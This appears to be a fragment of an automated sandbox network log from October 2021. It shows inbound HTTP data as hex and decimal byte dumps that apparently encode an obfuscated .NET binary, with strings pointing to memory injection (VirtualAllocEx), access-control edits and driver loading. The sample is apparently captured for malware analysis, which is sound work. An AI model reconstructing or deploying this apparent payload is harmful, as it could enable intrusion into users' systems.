                    2021-10-26 16:59:38 UTC2374INData Raw: 32 31 38 20 36 30 20 36 39 20 31 36 38 20 32 30 36 20 32 32 20 35 34 20 32 32 37 20 32 37 20 33 32 20 31 34 30 20 32 34 35 20 32 34 34 20 32 31 38 20 36 39 20 32 31 31 20 35 33 20 31 31 20 31 36 36 20 31 31 38 20 36 30 20 38 31 20 38 20 33 36 20 31 32 30 20 31 36 35 20 32 30 34 20 31 38 31 20 34 34 20 31 36 30 20 36 34 20 32 34 35 20 31 39 37 20 33 32 20 31 37 33 20 32 32 32 20 36 33 20 31 38 36 20 30 20 31 34 36 20 31 33 37 20 32 30 39 20 35 36 20 31 30 36 20 31 35 32 20 31 30 37 20 31 33 38 20 31 38 39 20 31 31 34 20 31 38 34 20 31 31 31 20 31 33 39 20 31 33 31 20 31 31 30 20 39 32 20 37 30 20 32 34 36 20 31 39 32 20 31 34 39 20 32 32 34 20 31 31 32 20 31 36 37 20 35 20 31 32 34 20 32 34 30 20 34 38 20 37 36 20 33 39 20 36 37 20 38 31 20 38 36 20 38 20
                    Data Ascii: 218 60 69 168 206 22 54 227 27 32 140 245 244 218 69 211 53 11 166 118 60 81 8 36 120 165 204 181 44 160 64 245 197 32 173 222 63 186 0 146 137 209 56 106 152 107 138 189 114 184 111 139 131 110 92 70 246 192 149 224 112 167 5 124 240 48 76 39 67 81 86 8
                    2021-10-26 16:59:38 UTC2390INData Raw: 20 32 32 34 20 32 30 33 20 32 35 30 20 31 31 37 20 31 35 39 20 32 35 20 32 34 31 20 32 31 31 20 33 39 20 31 36 38 20 35 36 20 31 33 34 20 31 30 32 20 36 34 20 35 39 20 31 35 31 20 36 38 20 32 31 36 20 33 39 20 38 33 20 31 39 31 20 32 30 34 20 32 36 20 39 39 20 38 32 20 31 34 39 20 32 32 34 20 31 34 20 36 38 20 31 37 38 20 31 33 35 20 35 34 20 31 30 37 20 38 30 20 39 37 20 35 20 31 39 33 20 34 38 20 31 30 37 20 31 35 31 20 37 37 20 39 34 20 32 30 32 20 32 33 34 20 32 35 30 20 31 33 39 20 32 32 39 20 31 38 36 20 31 34 35 20 39 36 20 32 34 36 20 33 38 20 31 32 34 20 32 34 38 20 31 30 34 20 31 32 36 20 31 31 31 20 31 33 37 20 32 30 36 20 31 32 34 20 39 20 39 20 32 35 32 20 32 36 20 31 31 32 20 32 32 39 20 33 33 20 32 33 32 20 31 34 20 31 35 34 20 39 36 20 32
                    Data Ascii: 224 203 250 117 159 25 241 211 39 168 56 134 102 64 59 151 68 216 39 83 191 204 26 99 82 149 224 14 68 178 135 54 107 80 97 5 193 48 107 151 77 94 202 234 250 139 229 186 145 96 246 38 124 248 104 126 111 137 206 124 9 9 252 26 112 229 33 232 14 154 96 2
                    2021-10-26 16:59:38 UTC2406INData Raw: 20 31 32 38 20 36 20 32 33 30 20 36 20 39 20 32 30 20 35 30 20 31 33 37 20 31 30 38 20 32 34 20 32 33 36 20 31 39 34 20 31 35 36 20 31 37 37 20 34 39 20 31 38 35 20 31 37 30 20 38 35 20 31 30 35 20 35 35 20 36 31 20 35 31 20 32 30 33 20 32 30 20 31 35 20 39 35 20 32 31 30 20 34 33 20 32 32 38 20 32 34 35 20 39 37 20 34 31 20 36 34 20 31 32 39 20 31 34 34 20 31 39 36 20 33 34 20 31 39 38 20 32 30 39 20 31 33 39 20 31 31 20 31 32 39 20 33 32 20 35 32 20 32 34 34 20 31 35 36 20 34 37 20 31 37 39 20 34 20 32 38 20 32 30 31 20 31 35 30 20 32 32 30 20 31 33 38 20 31 34 35 20 31 38 31 20 31 39 20 32 36 20 31 36 37 20 31 33 34 20 31 31 37 20 31 34 34 20 32 35 32 20 36 30 20 31 35 37 20 31 39 20 32 33 30 20 31 38 39 20 31 36 33 20 31 35 30 20 37 37 20 31 20 31 30
                    Data Ascii: 128 6 230 6 9 20 50 137 108 24 236 194 156 177 49 185 170 85 105 55 61 51 203 20 15 95 210 43 228 245 97 41 64 129 144 196 34 198 209 139 11 129 32 52 244 156 47 179 4 28 201 150 220 138 145 181 19 26 167 134 117 144 252 60 157 19 230 189 163 150 77 1 10
                    2021-10-26 16:59:38 UTC2422INData Raw: 37 20 32 30 30 20 32 33 31 20 31 32 31 20 38 30 20 31 37 38 20 32 20 36 34 20 31 30 33 20 31 31 36 20 32 32 39 20 32 34 38 20 31 33 37 20 38 32 20 36 30 20 31 34 35 20 31 37 31 20 36 36 20 32 34 39 20 31 31 33 20 31 39 36 20 30 20 34 30 20 31 31 32 20 38 36 20 31 37 37 20 31 36 35 20 33 35 20 38 30 20 31 39 36 20 31 39 38 20 31 36 39 20 32 30 34 20 31 37 39 20 36 20 35 33 20 38 36 20 32 30 31 20 31 30 39 20 31 35 38 20 36 32 20 31 32 36 20 31 34 39 20 32 31 31 20 32 33 32 20 35 34 20 35 35 20 32 34 37 20 31 32 33 20 31 33 36 20 31 37 37 20 32 34 20 39 35 20 32 32 32 20 32 33 36 20 31 34 34 20 36 31 20 32 31 20 35 39 20 32 37 20 32 32 38 20 31 37 31 20 31 36 39 20 31 30 35 20 33 34 20 36 37 20 31 32 30 20 31 34 38 20 35 31 20 32 31 34 20 31 32 30 20 31 34
                    Data Ascii: 7 200 231 121 80 178 2 64 103 116 229 248 137 82 60 145 171 66 249 113 196 0 40 112 86 177 165 35 80 196 198 169 204 179 6 53 86 201 109 158 62 126 149 211 232 54 55 247 123 136 177 24 95 222 236 144 61 21 59 27 228 171 169 105 34 67 120 148 51 214 120 14
                    2021-10-26 16:59:38 UTC2438INData Raw: 30 20 30 20 30 20 31 31 34 20 31 35 20 31 38 32 20 33 20 31 31 32 20 34 30 20 31 30 33 20 30 20 30 20 31 30 20 34 30 20 31 30 31 20 30 20 30 20 31 30 20 32 35 34 20 31 34 20 31 20 30 20 32 35 34 20 31 33 20 31 20 30 20 32 35 34 20 32 32 20 39 32 20 30 20 30 20 31 20 31 31 31 20 39 33 20 30 20 30 20 31 30 20 34 30 20 31 30 34 20 30 20 30 20 31 30 20 32 35 34 20 31 34 20 30 20 30 20 34 33 20 36 20 32 35 34 20 32 32 20 31 30 36 20 30 20 30 20 31 20 32 35 34 20 31 32 20 30 20 30 20 34 30 20 31 30 35 20 30 20 30 20 31 30 20 33 38 20 31 31 34 20 32 38 20 31 38 33 20 33 20 31 31 32 20 32 35 34 20 31 32 20 30 20 30 20 34 30 20 31 32 31 20 30 20 30 20 31 30 20 34 30 20 38 38 20 30 20 30 20 36 20 34 30 20 31 30 36 20 30 20 30 20 31 30 20 30 20 31 31 34 20 36 38 20
                    Data Ascii: 0 0 0 114 15 182 3 112 40 103 0 0 10 40 101 0 0 10 254 14 1 0 254 13 1 0 254 22 92 0 0 1 111 93 0 0 10 40 104 0 0 10 254 14 0 0 43 6 254 22 106 0 0 1 254 12 0 0 40 105 0 0 10 38 114 28 183 3 112 254 12 0 0 40 121 0 0 10 40 88 0 0 6 40 106 0 0 10 0 114 68
                    2021-10-26 16:59:38 UTC2454INData Raw: 20 30 20 31 30 20 31 31 31 20 31 34 33 20 30 20 30 20 31 30 20 32 35 34 20 31 34 20 39 20 30 20 35 36 20 31 37 34 20 30 20 30 20 30 20 32 35 34 20 31 32 20 39 20 30 20 31 31 31 20 31 34 34 20 30 20 30 20 31 30 20 32 35 34 20 31 34 20 31 30 20 30 20 33 32 20 34 20 30 20 30 20 30 20 32 35 34 20 31 34 20 32 20 30 20 32 35 34 20 31 32 20 31 30 20 30 20 31 31 34 20 34 39 20 33 20 34 20 31 31 32 20 31 31 31 20 31 34 39 20 30 20 30 20 31 30 20 31 31 31 20 39 33 20 30 20 30 20 31 30 20 31 31 34 20 35 39 20 33 20 34 20 31 31 32 20 31 31 31 20 31 31 38 20 30 20 30 20 31 30 20 35 37 20 33 34 20 30 20 30 20 30 20 32 35 34 20 31 32 20 31 30 20 30 20 31 31 34 20 34 39 20 33 20 34 20 31 31 32 20 31 31 31 20 31 34 39 20 30 20 30 20 31 30 20 31 31 31 20 39 33 20 30 20 30
                    Data Ascii: 0 10 111 143 0 0 10 254 14 9 0 56 174 0 0 0 254 12 9 0 111 144 0 0 10 254 14 10 0 32 4 0 0 0 254 14 2 0 254 12 10 0 114 49 3 4 112 111 149 0 0 10 111 93 0 0 10 114 59 3 4 112 111 118 0 0 10 57 34 0 0 0 254 12 10 0 114 49 3 4 112 111 149 0 0 10 111 93 0 0
                    2021-10-26 16:59:38 UTC2470INData Raw: 20 32 34 20 31 37 20 32 34 20 34 34 20 31 31 20 34 30 20 31 31 39 20 30 20 30 20 36 20 31 31 35 20 34 34 20 30 20 30 20 31 30 20 31 32 32 20 30 20 31 37 20 34 20 33 32 20 32 34 38 20 30 20 30 20 30 20 32 31 34 20 31 39 20 31 33 20 33 20 31 37 20 34 20 32 38 20 32 31 34 20 34 30 20 34 38 20 30 20 30 20 31 30 20 31 39 20 31 34 20 31 37 20 31 34 20 32 33 20 32 31 38 20 31 39 20 32 35 20 32 32 20 31 39 20 32 36 20 35 36 20 31 34 34 20 30 20 30 20 30 20 33 20 31 37 20 31 33 20 33 31 20 31 32 20 32 31 34 20 34 30 20 34 35 20 30 20 30 20 31 30 20 31 39 20 32 37 20 33 20 31 37 20 31 33 20 33 31 20 31 36 20 32 31 34 20 34 30 20 34 35 20 30 20 30 20 31 30 20 31 39 20 32 38 20 33 20 31 37 20 31 33 20 33 31 20 32 30 20 32 31 34 20 34 30 20 34 35 20 30 20 30 20 31 30
                    Data Ascii: 24 17 24 44 11 40 119 0 0 6 115 44 0 0 10 122 0 17 4 32 248 0 0 0 214 19 13 3 17 4 28 214 40 48 0 0 10 19 14 17 14 23 218 19 25 22 19 26 56 144 0 0 0 3 17 13 31 12 214 40 45 0 0 10 19 27 3 17 13 31 16 214 40 45 0 0 10 19 28 3 17 13 31 20 214 40 45 0 0 10
                    2021-10-26 16:59:38 UTC2486INData Raw: 31 32 20 33 31 20 31 30 32 20 31 35 37 20 33 37 20 33 32 20 31 31 20 30 20 30 20 30 20 33 31 20 35 34 20 31 35 37 20 33 37 20 33 32 20 31 31 20 30 20 30 20 30 20 33 31 20 31 30 31 20 31 35 37 20 33 37 20 33 32 20 31 31 20 30 20 30 20 30 20 33 31 20 39 38 20 31 35 37 20 33 37 20 33 32 20 31 31 20 30 20 30 20 30 20 33 31 20 35 35 20 31 35 37 20 33 37 20 33 31 20 31 31 20 33 31 20 37 39 20 31 35 37 20 33 37 20 33 32 20 31 30 20 30 20 30 20 30 20 33 31 20 39 39 20 31 35 37 20 33 37 20 33 32 20 31 30 20 30 20 30 20 30 20 33 31 20 35 35 20 31 35 37 20 33 37 20 33 32 20 31 30 20 30 20 30 20 30 20 33 31 20 34 39 20 31 35 37 20 33 37 20 33 32 20 31 30 20 30 20 30 20 30 20 33 31 20 34 38 20 31 35 37 20 33 37 20 33 31 20 31 30 20 33 31 20 31 31 39 20 31 35 37 20 33
                    Data Ascii: 12 31 102 157 37 32 11 0 0 0 31 54 157 37 32 11 0 0 0 31 101 157 37 32 11 0 0 0 31 98 157 37 32 11 0 0 0 31 55 157 37 31 11 31 79 157 37 32 10 0 0 0 31 99 157 37 32 10 0 0 0 31 55 157 37 32 10 0 0 0 31 49 157 37 32 10 0 0 0 31 48 157 37 31 10 31 119 157 3
                    2021-10-26 16:59:38 UTC2502INData Raw: 33 32 20 35 20 30 20 30 20 30 20 33 31 20 39 37 20 31 35 37 20 33 37 20 32 37 20 33 31 20 35 30 20 31 35 37 20 33 37 20 33 32 20 34 20 30 20 30 20 30 20 33 31 20 35 33 20 31 35 37 20 33 37 20 33 32 20 34 20 30 20 30 20 30 20 33 31 20 31 30 30 20 31 35 37 20 33 37 20 33 32 20 34 20 30 20 30 20 30 20 33 31 20 31 30 31 20 31 35 37 20 33 37 20 33 32 20 34 20 30 20 30 20 30 20 33 31 20 35 36 20 31 35 37 20 33 37 20 32 36 20 33 31 20 31 31 32 20 31 35 37 20 33 37 20 33 32 20 33 20 30 20 30 20 30 20 33 31 20 35 37 20 31 35 37 20 33 37 20 33 32 20 33 20 30 20 30 20 30 20 33 31 20 31 30 31 20 31 35 37 20 33 37 20 33 32 20 33 20 30 20 30 20 30 20 33 31 20 35 30 20 31 35 37 20 33 37 20 33 32 20 33 20 30 20 30 20 30 20 33 31 20 39 39 20 31 35 37 20 33 37 20 32 35 20
                    Data Ascii: 32 5 0 0 0 31 97 157 37 27 31 50 157 37 32 4 0 0 0 31 53 157 37 32 4 0 0 0 31 100 157 37 32 4 0 0 0 31 101 157 37 32 4 0 0 0 31 56 157 37 26 31 112 157 37 32 3 0 0 0 31 57 157 37 32 3 0 0 0 31 101 157 37 32 3 0 0 0 31 50 157 37 32 3 0 0 0 31 99 157 37 25
                    2021-10-26 16:59:38 UTC2518INData Raw: 32 20 38 36 20 31 32 38 20 32 32 37 20 31 38 33 20 31 30 31 20 31 32 20 38 36 20 31 32 38 20 31 33 30 20 31 39 35 20 31 30 31 20 31 32 20 38 36 20 31 32 38 20 31 31 34 20 39 31 20 31 30 31 20 31 32 20 38 36 20 31 32 38 20 31 38 38 20 31 36 35 20 31 30 31 20 31 32 20 38 36 20 31 32 38 20 31 32 20 31 38 33 20 31 30 31 20 31 32 20 38 36 20 31 32 38 20 32 35 30 20 39 37 20 31 30 31 20 31 32 20 38 36 20 31 32 38 20 31 38 32 20 31 38 30 20 31 30 31 20 31 32 20 38 36 20 31 32 38 20 31 38 38 20 31 35 32 20 31 30 31 20 31 32 20 38 36 20 31 32 38 20 32 34 32 20 31 35 37 20 31 30 31 20 31 32 20 38 36 20 31 32 38 20 31 31 34 20 31 30 34 20 31 30 31 20 31 32 20 38 36 20 31 32 38 20 32 31 34 20 31 35 31 20 31 30 31 20 31 32 20 38 36 20 31 32 38 20 31 36 34 20 39 35 20
                    Data Ascii: 2 86 128 227 183 101 12 86 128 130 195 101 12 86 128 114 91 101 12 86 128 188 165 101 12 86 128 12 183 101 12 86 128 250 97 101 12 86 128 182 180 101 12 86 128 188 152 101 12 86 128 242 157 101 12 86 128 114 104 101 12 86 128 214 151 101 12 86 128 164 95
                    2021-10-26 16:59:38 UTC2534INData Raw: 33 20 30 20 30 20 30 20 32 32 20 30 20 31 31 30 20 31 39 34 20 36 38 20 32 20 31 37 37 20 30 20 31 34 34 20 31 36 37 20 33 20 30 20 30 20 30 20 32 32 20 30 20 31 31 32 20 31 31 30 20 36 38 20 32 20 31 37 37 20 30 20 31 34 38 20 31 37 30 20 33 20 30 20 30 20 30 20 32 32 20 30 20 32 33 38 20 32 31 38 20 36 38 20 32 20 31 37 37 20 30 20 38 33 20 37 39 20 33 20 30 20 30 20 30 20 31 35 30 20 30 20 32 32 39 20 32 32 33 20 31 36 31 20 31 36 20 31 37 37 20 30 20 31 30 38 20 37 39 20 33 20 30 20 30 20 30 20 31 35 30 20 30 20 36 30 20 39 39 20 31 37 30 20 31 36 20 31 37 37 20 30 20 31 34 34 20 37 39 20 33 20 30 20 30 20 30 20 31 35 30 20 30 20 32 32 20 32 32 31 20 32 30 32 20 31 36 20 31 37 37 20 30 20 31 36 30 20 37 39 20 33 20 30 20 30 20 30 20 31 35 30 20 30 20
                    Data Ascii: 3 0 0 0 22 0 110 194 68 2 177 0 144 167 3 0 0 0 22 0 112 110 68 2 177 0 148 170 3 0 0 0 22 0 238 218 68 2 177 0 83 79 3 0 0 0 150 0 229 223 161 16 177 0 108 79 3 0 0 0 150 0 60 99 170 16 177 0 144 79 3 0 0 0 150 0 22 221 202 16 177 0 160 79 3 0 0 0 150 0
                    2021-10-26 16:59:38 UTC2550INData Raw: 38 20 30 20 31 38 38 20 39 20 31 38 32 20 39 20 38 20 30 20 31 39 32 20 39 20 31 38 37 20 39 20 38 20 30 20 31 39 36 20 39 20 32 30 32 20 39 20 38 20 30 20 32 30 30 20 39 20 32 31 37 20 39 20 38 20 30 20 32 30 34 20 39 20 32 32 32 20 39 20 38 20 30 20 32 32 38 20 39 20 31 34 20 31 32 20 38 20 30 20 32 33 32 20 39 20 31 39 20 31 32 20 38 20 30 20 32 33 36 20 39 20 32 34 20 31 32 20 38 20 30 20 32 34 30 20 39 20 32 31 34 20 32 20 38 20 30 20 32 34 34 20 39 20 31 39 39 20 32 20 38 20 30 20 32 34 38 20 39 20 37 31 20 31 30 20 38 20 30 20 32 35 32 20 39 20 32 39 20 31 32 20 38 20 30 20 30 20 31 30 20 33 34 20 31 32 20 38 20 30 20 34 20 31 30 20 39 20 31 32 20 38 20 30 20 38 20 31 30 20 32 34 34 20 32 20 38 20 30 20 31 32 20 31 30 20 33 39 20 31 32 20 38 20 30
                    Data Ascii: 8 0 188 9 182 9 8 0 192 9 187 9 8 0 196 9 202 9 8 0 200 9 217 9 8 0 204 9 222 9 8 0 228 9 14 12 8 0 232 9 19 12 8 0 236 9 24 12 8 0 240 9 214 2 8 0 244 9 199 2 8 0 248 9 71 10 8 0 252 9 29 12 8 0 0 10 34 12 8 0 4 10 9 12 8 0 8 10 244 2 8 0 12 10 39 12 8 0
                    2021-10-26 16:59:38 UTC2566INData Raw: 31 31 35 20 31 31 39 20 31 31 31 20 31 31 34 20 31 30 30 20 30 20 37 31 20 31 30 31 20 31 31 30 20 31 30 31 20 31 31 34 20 31 30 35 20 39 39 20 36 35 20 39 39 20 31 30 31 20 30 20 36 37 20 31 31 31 20 31 30 39 20 31 30 39 20 31 31 31 20 31 31 30 20 36 35 20 39 39 20 31 30 31 20 30 20 37 33 20 31 31 30 20 31 31 35 20 31 30 31 20 31 31 34 20 31 31 36 20 36 35 20 39 39 20 31 30 31 20 30 20 38 33 20 31 32 31 20 31 31 35 20 31 31 36 20 31 30 31 20 31 30 39 20 37 36 20 31 31 31 20 39 37 20 31 30 30 20 37 31 20 31 30 30 20 31 30 35 20 36 38 20 31 31 34 20 31 30 35 20 31 31 38 20 31 30 31 20 31 31 34 20 37 33 20 31 31 30 20 38 33 20 31 32 31 20 31 31 35 20 31 31 36 20 31 30 31 20 31 30 39 20 38 33 20 31 31 32 20 39 37 20 39 39 20 31 30 31 20 30 20 37 38 20 31 31
                    Data Ascii: 115 119 111 114 100 0 71 101 110 101 114 105 99 65 99 101 0 67 111 109 109 111 110 65 99 101 0 73 110 115 101 114 116 65 99 101 0 83 121 115 116 101 109 76 111 97 100 71 100 105 68 114 105 118 101 114 73 110 83 121 115 116 101 109 83 112 97 99 101 0 78 11
                    2021-10-26 16:59:38 UTC2582INData Raw: 31 20 31 31 34 20 31 30 39 20 39 37 20 31 31 36 20 31 30 35 20 31 31 31 20 31 31 30 20 30 20 38 33 20 31 32 31 20 31 31 35 20 31 31 36 20 31 30 31 20 31 30 39 20 38 33 20 31 31 36 20 39 37 20 39 39 20 31 30 37 20 38 34 20 31 31 34 20 39 37 20 39 39 20 31 30 31 20 37 33 20 31 31 30 20 31 30 32 20 31 31 31 20 31 31 34 20 31 30 39 20 39 37 20 31 31 36 20 31 30 35 20 31 31 31 20 31 31 30 20 30 20 38 33 20 31 32 31 20 31 31 35 20 31 31 36 20 31 30 31 20 31 30 39 20 36 38 20 31 30 31 20 31 31 38 20 31 30 35 20 39 39 20 31 30 31 20 37 33 20 31 31 30 20 31 30 32 20 31 31 31 20 31 31 34 20 31 30 39 20 39 37 20 31 31 36 20 31 30 35 20 31 31 31 20 31 31 30 20 30 20 38 33 20 31 32 31 20 31 31 35 20 31 31 36 20 31 30 31 20 31 30 39 20 36 36 20 39 37 20 31 31 35 20 31
                    Data Ascii: 1 114 109 97 116 105 111 110 0 83 121 115 116 101 109 83 116 97 99 107 84 114 97 99 101 73 110 102 111 114 109 97 116 105 111 110 0 83 121 115 116 101 109 68 101 118 105 99 101 73 110 102 111 114 109 97 116 105 111 110 0 83 121 115 116 101 109 66 97 115 1
                    2021-10-26 16:59:38 UTC2598INData Raw: 20 31 30 30 20 38 30 20 31 31 34 20 31 31 31 20 31 30 39 20 31 31 31 20 31 31 36 20 31 30 35 20 31 31 31 20 31 31 30 20 30 20 38 37 20 31 30 35 20 31 31 30 20 35 31 20 35 30 20 36 39 20 31 32 30 20 39 39 20 31 30 31 20 31 31 32 20 31 31 36 20 31 30 35 20 31 31 31 20 31 31 30 20 30 20 37 38 20 31 31 31 20 31 31 30 20 36 37 20 31 31 31 20 31 31 30 20 31 31 36 20 31 30 35 20 31 31 30 20 31 31 37 20 39 37 20 39 38 20 31 30 38 20 31 30 31 20 36 39 20 31 32 30 20 39 39 20 31 30 31 20 31 31 32 20 31 31 36 20 31 30 35 20 31 31 31 20 31 31 30 20 30 20 38 34 20 31 30 34 20 31 31 34 20 31 30 31 20 39 37 20 31 30 30 20 36 38 20 31 30 31 20 31 31 35 20 39 39 20 31 31 34 20 31 30 35 20 31 31 32 20 31 31 36 20 31 30 35 20 31 31 31 20 31 31 30 20 30 20 38 33 20 31 32 31
                    Data Ascii: 100 80 114 111 109 111 116 105 111 110 0 87 105 110 51 50 69 120 99 101 112 116 105 111 110 0 78 111 110 67 111 110 116 105 110 117 97 98 108 101 69 120 99 101 112 116 105 111 110 0 84 104 114 101 97 100 68 101 115 99 114 105 112 116 105 111 110 0 83 121
                    2021-10-26 16:59:38 UTC2614INData Raw: 20 37 33 20 31 31 30 20 31 31 36 20 31 30 31 20 31 30 33 20 31 30 31 20 31 31 34 20 37 39 20 31 31 38 20 31 30 31 20 31 31 34 20 31 30 32 20 31 30 38 20 31 31 31 20 31 31 39 20 30 20 37 30 20 31 30 38 20 31 31 31 20 39 37 20 31 31 36 20 37 39 20 31 31 38 20 31 30 31 20 31 31 34 20 31 30 32 20 31 30 38 20 31 31 31 20 31 31 39 20 30 20 36 38 20 31 30 31 20 31 30 38 20 31 30 31 20 31 30 33 20 39 37 20 31 31 36 20 31 30 31 20 38 36 20 31 30 35 20 31 31 34 20 31 31 36 20 31 31 37 20 39 37 20 31 30 38 20 36 35 20 31 30 38 20 31 30 38 20 31 31 31 20 39 39 20 36 39 20 31 32 30 20 30 20 38 30 20 31 31 34 20 31 31 31 20 39 39 20 31 30 31 20 31 31 35 20 31 31 35 20 38 37 20 31 31 31 20 31 31 34 20 31 30 37 20 31 30 35 20 31 31 30 20 31 30 33 20 38 33 20 31 30 31 20
                    Data Ascii: 73 110 116 101 103 101 114 79 118 101 114 102 108 111 119 0 70 108 111 97 116 79 118 101 114 102 108 111 119 0 68 101 108 101 103 97 116 101 86 105 114 116 117 97 108 65 108 108 111 99 69 120 0 80 114 111 99 101 115 115 87 111 114 107 105 110 103 83 101
                    2021-10-26 16:59:38 UTC2630INData Raw: 31 20 31 31 34 20 31 32 31 20 30 20 36 37 20 31 31 34 20 31 30 31 20 39 37 20 31 31 36 20 31 30 31 20 36 38 20 31 30 35 20 31 31 34 20 31 30 31 20 39 39 20 31 31 36 20 31 31 31 20 31 31 34 20 31 32 31 20 30 20 37 33 20 36 38 20 31 30 31 20 31 31 35 20 39 39 20 31 31 34 20 31 30 35 20 31 31 32 20 31 31 36 20 31 30 35 20 31 31 31 20 31 31 30 20 37 37 20 31 30 31 20 31 31 36 20 39 37 20 31 30 30 20 39 37 20 31 31 36 20 39 37 20 36 39 20 31 31 30 20 31 31 36 20 31 31 34 20 31 32 31 20 30 20 36 37 20 37 36 20 38 32 20 38 33 20 31 31 37 20 31 31 34 20 31 31 34 20 31 31 31 20 31 30 33 20 39 37 20 31 31 36 20 31 30 31 20 36 39 20 31 31 30 20 31 31 36 20 31 31 34 20 31 32 31 20 30 20 38 32 20 31 30 31 20 31 30 33 20 31 30 35 20 31 31 35 20 31 31 36 20 31 31 34 20
                    Data Ascii: 1 114 121 0 67 114 101 97 116 101 68 105 114 101 99 116 111 114 121 0 73 68 101 115 99 114 105 112 116 105 111 110 77 101 116 97 100 97 116 97 69 110 116 114 121 0 67 76 82 83 117 114 114 111 103 97 116 101 69 110 116 114 121 0 82 101 103 105 115 116 114
                    2021-10-26 16:59:38 UTC2646INData Raw: 20 32 33 39 20 31 34 38 20 31 37 38 20 32 33 39 20 31 34 39 20 31 33 35 20 30 20 32 33 39 20 31 35 30 20 31 33 32 20 32 33 39 20 31 35 30 20 31 34 35 20 32 33 39 20 31 34 39 20 31 35 36 20 32 33 39 20 31 35 30 20 31 33 32 20 32 33 39 20 31 35 30 20 31 33 36 20 32 33 39 20 31 34 39 20 31 34 37 20 32 33 39 20 31 35 30 20 31 35 33 20 32 33 39 20 31 34 39 20 31 35 32 20 32 33 39 20 31 35 30 20 31 33 33 20 32 33 39 20 31 34 39 20 31 35 31 20 32 33 39 20 31 34 39 20 31 35 31 20 32 33 39 20 31 35 30 20 31 35 31 20 32 33 39 20 31 34 39 20 31 35 34 20 32 33 39 20 31 35 30 20 31 35 31 20 32 33 39 20 31 35 30 20 31 33 35 20 30 20 32 33 38 20 31 36 34 20 31 33 36 20 32 33 38 20 31 36 34 20 31 33 33 20 32 33 38 20 31 36 34 20 31 33 32 20 32 33 38 20 31 36 34 20 31 33
                    Data Ascii: 239 148 178 239 149 135 0 239 150 132 239 150 145 239 149 156 239 150 132 239 150 136 239 149 147 239 150 153 239 149 152 239 150 133 239 149 151 239 149 151 239 150 151 239 149 154 239 150 151 239 150 135 0 238 164 136 238 164 133 238 164 132 238 164 13
                    2021-10-26 16:59:38 UTC2662INData Raw: 33 33 20 31 38 32 20 31 34 35 20 32 33 33 20 31 38 32 20 31 34 32 20 30 20 32 33 33 20 31 38 34 20 31 37 35 20 32 33 33 20 31 38 34 20 31 34 30 20 32 33 33 20 31 38 34 20 31 34 30 20 32 33 33 20 31 38 34 20 31 38 37 20 32 33 33 20 31 38 35 20 31 33 30 20 32 33 33 20 31 38 35 20 31 33 34 20 32 33 33 20 31 38 34 20 31 33 35 20 32 33 33 20 31 38 34 20 31 33 38 20 32 33 33 20 31 38 35 20 31 33 33 20 32 33 33 20 31 38 34 20 31 36 31 20 32 33 33 20 31 38 34 20 31 33 36 20 32 33 33 20 31 38 34 20 31 35 33 20 32 33 33 20 31 38 34 20 31 34 31 20 32 33 33 20 31 38 34 20 31 38 35 20 32 33 33 20 31 38 34 20 31 34 32 20 30 20 32 32 38 20 31 38 39 20 31 34 38 20 32 32 38 20 31 38 39 20 31 37 39 20 32 32 38 20 31 38 39 20 31 33 31 20 32 32 38 20 31 38 38 20 31 39 30 20
                    Data Ascii: 33 182 145 233 182 142 0 233 184 175 233 184 140 233 184 140 233 184 187 233 185 130 233 185 134 233 184 135 233 184 138 233 185 133 233 184 161 233 184 136 233 184 153 233 184 141 233 184 185 233 184 142 0 228 189 148 228 189 179 228 189 131 228 188 190
                    2021-10-26 16:59:38 UTC2678INData Raw: 20 31 37 35 20 31 33 33 20 32 33 31 20 31 37 34 20 31 38 33 20 32 33 31 20 31 37 34 20 31 35 34 20 32 33 31 20 31 37 35 20 31 33 33 20 32 33 31 20 31 37 34 20 31 35 31 20 32 33 31 20 31 37 34 20 31 35 30 20 32 33 31 20 31 37 34 20 31 34 39 20 30 20 32 32 34 20 31 37 35 20 31 34 34 20 32 32 34 20 31 37 36 20 31 34 39 20 32 32 34 20 31 37 35 20 31 34 33 20 32 32 34 20 31 37 35 20 31 37 34 20 32 32 34 20 31 37 36 20 31 32 38 20 32 32 34 20 31 37 35 20 31 34 34 20 32 32 34 20 31 37 35 20 31 39 31 20 32 32 34 20 31 37 35 20 31 34 38 20 32 32 34 20 31 37 36 20 31 32 38 20 32 32 34 20 31 37 35 20 31 34 35 20 32 32 34 20 31 37 35 20 31 38 39 20 32 32 34 20 31 37 36 20 31 32 38 20 32 32 34 20 31 37 35 20 31 35 38 20 32 32 34 20 31 37 35 20 31 34 34 20 32 32 34 20
                    Data Ascii: 175 133 231 174 183 231 174 154 231 175 133 231 174 151 231 174 150 231 174 149 0 224 175 144 224 176 149 224 175 143 224 175 174 224 176 128 224 175 144 224 175 191 224 175 148 224 176 128 224 175 145 224 175 189 224 176 128 224 175 158 224 175 144 224
                    2021-10-26 16:59:38 UTC2694INData Raw: 20 31 36 34 20 31 35 32 20 32 33 32 20 31 36 34 20 31 35 36 20 32 33 32 20 31 36 34 20 31 34 38 20 32 33 32 20 31 36 34 20 31 37 30 20 32 33 32 20 31 36 35 20 31 33 39 20 32 33 32 20 31 36 34 20 31 35 36 20 32 33 32 20 31 36 34 20 31 36 36 20 32 33 32 20 31 36 35 20 31 34 38 20 32 33 32 20 31 36 35 20 31 33 34 20 32 33 32 20 31 36 34 20 31 35 37 20 32 33 32 20 31 36 34 20 31 35 36 20 32 33 32 20 31 36 34 20 31 35 36 20 30 20 32 33 30 20 31 36 35 20 31 37 36 20 32 33 30 20 31 36 35 20 31 35 38 20 32 33 30 20 31 36 35 20 31 35 35 20 32 33 30 20 31 36 35 20 31 35 37 20 32 33 30 20 31 36 36 20 31 36 32 20 32 33 30 20 31 36 35 20 31 37 37 20 32 33 30 20 31 36 35 20 31 36 31 20 32 33 30 20 31 36 35 20 31 35 37 20 32 33 30 20 31 36 35 20 31 37 38 20 32 33 30 20
                    Data Ascii: 164 152 232 164 156 232 164 148 232 164 170 232 165 139 232 164 156 232 164 166 232 165 148 232 165 134 232 164 157 232 164 156 232 164 156 0 230 165 176 230 165 158 230 165 155 230 165 157 230 166 162 230 165 177 230 165 161 230 165 157 230 165 178 230
